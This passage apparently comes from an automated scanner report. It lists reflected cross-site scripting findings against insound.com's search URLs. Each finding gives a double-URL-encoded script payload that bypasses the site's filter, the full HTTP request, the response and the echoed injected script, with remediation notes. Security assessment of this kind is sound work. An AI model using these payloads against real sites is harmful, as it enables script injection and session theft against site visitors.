Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="CFCF5f843"><script>alert(1)</script>243c2d95501" />
...[SNIP]...

1.25. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cameo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 11c11%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec331f00e8fa was submitted in the REST URL parameter 3. This input was echoed as 11c11</title><script>alert(1)</script>c331f00e8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cameo11c11%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec331f00e8fa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9tvihq52cibg1dhds13oei83s0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=422758122; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=235224021; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cameo11c11</title><script>alert(1)</script>c331f00e8fa</title>
...[SNIP]...

1.26. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cameo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f690810b46 was submitted in the REST URL parameter 3. This input was echoed as 27fd2"><script>alert(1)</script>8f690810b46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cameo27fd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f690810b46&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hegtsa2n19qb12h1b0rga4l8f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562204887; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=400406898; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cameo27fd2"><script>alert(1)</script>8f690810b46" />
...[SNIP]...

1.27. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camera%20Obscura&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf01457e40f was submitted in the REST URL parameter 3. This input was echoed as c9dbc"><script>alert(1)</script>cf01457e40f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camera%20Obscurac9dbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf01457e40f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4kt9akaqie9261scq57o5e4mi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247155637; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182984944; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camera Obscurac9dbc"><script>alert(1)</script>cf01457e40f" />
...[SNIP]...

1.28. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camera%20Obscura&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4c77b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf73ed124e was submitted in the REST URL parameter 3. This input was echoed as 4c77b</title><script>alert(1)</script>baf73ed124e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camera%20Obscura4c77b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf73ed124e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k78mtfcm3g97l95gc7g88jkg56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=255010884; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=179227764; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camera Obscura4c77b</title><script>alert(1)</script>baf73ed124e</title>
...[SNIP]...

1.29. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camp%20Lo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f14bd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef8d193011e was submitted in the REST URL parameter 3. This input was echoed as f14bd</title><script>alert(1)</script>f8d193011e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camp%20Lof14bd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef8d193011e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uu79f4ha13vkh30f2dkjtp9686; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=55527466; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=34537506; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camp Lof14bd</title><script>alert(1)</script>f8d193011e</title>
...[SNIP]...

1.30. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camp%20Lo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3081c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7be6001c5ac was submitted in the REST URL parameter 3. This input was echoed as 3081c"><script>alert(1)</script>7be6001c5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camp%20Lo3081c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7be6001c5ac&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tbh5i32hh0qdav8oj20qh7d530; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=139096742; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=299575150; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camp Lo3081c"><script>alert(1)</script>7be6001c5ac" />
...[SNIP]...

1.31. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Beethoven&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ef3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20b1bcf624f was submitted in the REST URL parameter 3. This input was echoed as b9ef3"><script>alert(1)</script>20b1bcf624f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Beethovenb9ef3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20b1bcf624f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4rcshk9thvab95oboc2cdjo734; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=550012324; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=562711935; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camper Van Beethovenb9ef3"><script>alert(1)</script>20b1bcf624f" />
...[SNIP]...

1.32. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Beethoven&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4cb53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54338b35555 was submitted in the REST URL parameter 3. This input was echoed as 4cb53</title><script>alert(1)</script>54338b35555 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Beethoven4cb53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54338b35555&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ugng25el01jvq8nr74bpse3b02; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=412975750; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=354783998; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camper Van Beethoven4cb53</title><script>alert(1)</script>54338b35555</title>
...[SNIP]...

1.33. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Chadbourne&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e936827edfe was submitted in the REST URL parameter 3. This input was echoed as dcf05"><script>alert(1)</script>936827edfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Chadbournedcf05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e936827edfe&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d8r7n4sm72cgfgengo9uonbp96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=101771614; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=128754219; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camper Van Chadbournedcf05"><script>alert(1)</script>936827edfe" />
...[SNIP]...

1.34. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Chadbourne&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 45350%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e9b2c81899 was submitted in the REST URL parameter 3. This input was echoed as 45350</title><script>alert(1)</script>9e9b2c81899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Chadbourne45350%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e9b2c81899&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vbh0hmsrl3r8gjpfetd03fp2s2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=441191144; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=268677198; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camper Van Chadbourne45350</title><script>alert(1)</script>9e9b2c81899</title>
...[SNIP]...

1.35. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camu%20Tao&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4602a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52fca981ab6 was submitted in the REST URL parameter 3. This input was echoed as 4602a"><script>alert(1)</script>52fca981ab6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camu%20Tao4602a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52fca981ab6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7fpi79lt9l0a5jaqo8d1uempc5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378917313; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=120909250; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camu Tao4602a"><script>alert(1)</script>52fca981ab6" />
...[SNIP]...

1.36. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camu%20Tao&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2a5b5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2927d88952d was submitted in the REST URL parameter 3. This input was echoed as 2a5b5</title><script>alert(1)</script>2927d88952d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camu%20Tao2a5b5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2927d88952d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bber7m2f2vt1tmvvk1g8pgnv14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
